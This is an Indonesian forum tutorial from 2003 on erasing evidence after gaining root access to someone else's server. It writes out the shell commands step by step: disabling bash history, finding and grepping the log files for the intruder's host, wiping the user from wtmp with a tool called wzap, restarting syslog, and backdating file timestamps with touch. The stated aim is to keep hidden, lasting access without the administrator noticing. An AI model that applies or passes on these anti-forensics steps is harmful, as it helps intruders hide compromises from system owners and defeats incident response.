Menghapus Jejak secara manual Pada server target Saturday, June 14, 2003- Jumlah Klik [3216] , Penulis : juventini Jasakom - Pernahkah anda membaca berita tentang hacker yang menguasai sebuah server sampai tahunan? Walaupun akhirnya diketahui, menyembunyikan keberadaan kita di sebuah server adalah suatu teknik yang menarik. Disini saya cuman mau ngasih sedikit pencerahan bagi kalian semua tentang cara2 manual dalam penghapusan log setelah kalian mendapatkan akses root pada server target. Ok..misalkan saja kalian sudah sampai pada tahap ini : sh-2.05b# id uid=0(root) gid=0(root) groups=10(wheel) sh-2.05b# whoami root Nah selanjutnya tentu saja kalian berharap kalo akses kalian akan kekal abadi di server itu sehingga bisa mengaksesnya kapan saja dan dimana saja dan tentu saja tanpa diketahui oleh sang admin..hehehe. Untuk itu tentu saja kalian perlu menghapus jejak yang kalian tinggalkan di server itu sehingga admin tidak curiga.Langkah pertama yang perlu lakukan adalah membuat history yang kita tinggalkan di bash shell lari ke /dev/null. Perintahnya : sh-2.05b# unset HISTFILE sh-2.05b# HISTFILE=/dev/null sh-2.05b# export HISTFILE Atau hal ini bisa juga dilakukan dengan membuat "shortcut" device /dev/null ke direktori home, dengan nama .bash_history melalui perintah : sh-2.05b# ln -s /dev/null .bash_history Setelah itu yang perlu dilakukan adalah mencari informasi lokasi file-file log berada. Untuk ini kita bisa melihatnya pada file konfigurasi /etc/syslog.conf, seperti ini : sh-2.05b# more syslog.conf # Log all kernel messages to the console. # Logging much else clutters up the screen. #kern.* /dev/console # Log anything (except mail) of level info or higher. # Don't log private authentication messages! *.info;mail.none;authpriv.none;cron.none /var/log/messages # The authpriv file has restricted access. authpriv.* /var/log/secure # Log all the mail messages in one place. mail.* /var/log/maillog # Log cron stuff cron.* /var/log/cron # Everybody gets emergency messages *.emerg * # Save news errors of level crit and higher in a special file. uucp,news.crit /var/log/spooler # Save boot messages also to boot.log local7.* /var/log/boot.log Nah lho..berarti file-file log nya tersimpan pada direktori /var/log..hehehehe Sekarang yang perlu kita lakukan adalah mengetahui di bagian mana dari direktori /var/log tadi yg memuat host dan ip kita. sh-2.05b# cd /var/log sh-2.05b# grep juve.bekaz-kernet.biz * |more Dengan perintah tsb, kita akan menemukan baris-baris entri yang memuat seluruh identitas kita, nah berarti yang perlu kita lakukan adalah menghapus(mengedit?) entri tsb. Apakah sampai disitu saja? Tentu tidak, karena file log wtmp adalah format binary (untuk perintah who) maka kita perlu semacam rootkit disini untuk menghapus jejak user kita dari log wtmp. disini kalian bisa pake wzap (www.ayink-suka.com/wzap) sh-2.05b# who ./wtmp root pts/0 Feb 17 00:21 (xx.x.xx.x) juve pts/2 Jun 10 00:37 (xxx.xx.xx.x) nah lho masih keliatan kalo si "juve" baru saja login di server tsb, hal ini tentu saja akan membuat sang admin curiga. disini kita perlu semacam rootkit untuk menghapus jejak kita pada log wtmp. disini kita coba dengan wzap (www.ayink-suka.com/wzap) : sh-2.05b# ./wzap Enter username to zap from the wtmp: juve opening file... opening output file... working... sh-2.05b# who ./wtmp.out root pts/0 Feb 17 00:21 (xx.x.xx.x) nah udah keapus deh..hehehehe..aman yah sekarang ? Maka amankah kita sudah? BELUM donk!! hehehe..masih ada syslogd. Program syslogd seperti kita ketahui akan membaca dan melakukan log beragam pesan yang diteruskan kernel, untuk kemudian dicatat ke file-file spesifik yang ada pada file /etc/syslog.conf Oleh karena itu maka kita perlu merestart syslogd agar informasi2 yang kita ubah dapat segera bekerja..hehehe... sh-2.05b# # /etc/init.d/syslog stop sh-2.05b# # /etc/init.d/syslog start nah sipp deh...sekarang kalian pikir udah 100% aman? weksss..belum lah (pasti ada aja yg misuh-misuh..hehehe), coba deh kamu liat file2 yang ada pada direktori yang kamu masuki di server target : sh-2.05b# ls -al coba perhatikan file wtmp dan wtmp.out disitu terlihat bahwa telah terjadi modifikasi pada file tsb pada tanggal 10 juni..nah hal ini bisa juga memancing kecurigaan admin, oleh karena itu cepat-cepat diubah deh, caranya dengan : sh-2.05b# touch 05241702 wtmp touch: warning: `touch 05241702' is obsolete; use `touch -t 200305241702.00' sh-2.05b# touch 05241702 wtmp.out touch: warning: `touch 05241702' is obsolete; use `touch -t 200305241702.00' nah sudah sekarang..oh iyah 05241702 itu artinya bulan 5 tgl 24 jam 17.02. Sekarang coba kalian cek lagi : sh-2.05b# ls -al hehehhe..berubah kan? sipp..nah lakukan juga ini pada semua file2 lainnya yg telah kalian modifikasi. Ok segitu dulu ya..maaf kalo ini kelihatannya masih newbies banget..soalnya saya juga newbies..mohon bimbingan para senior-senior sekalian..HORMATT GRAK!!!..hehehe..byeee!! Big THX : pak-tani,ass4ssin,scut,taksaka2,PUPET,AXal, and all my Friend!! mas JLo (shell script-nya menyusul ya mas..p~)